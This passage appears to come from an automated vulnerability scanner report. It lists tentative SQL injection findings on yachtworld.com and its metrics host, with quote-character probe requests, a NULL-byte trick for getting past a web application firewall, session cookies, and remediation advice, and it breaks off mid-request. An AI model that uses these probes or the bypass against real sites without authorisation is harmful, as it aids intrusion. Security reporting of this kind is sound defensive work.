Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s48372025459539 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html


1.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld/1%00'/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1 was not found on this server.</p
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1%00''/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
xserver: www663
Content-Length: 0
Content-Type: text/html


1.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [VIEWED_BOATS_STORE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The VIEWED_BOATS_STORE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the VIEWED_BOATS_STORE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00'; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 20:02:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States%00''; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:16 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...

1.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [primary_photo_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The primary_photo_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the primary_photo_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30'&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response 1 (redirected)

HTTP/1.0 503 Service Temporarily Unavailable
Date: Thu, 27 Jan 2011 21:16:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30''&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 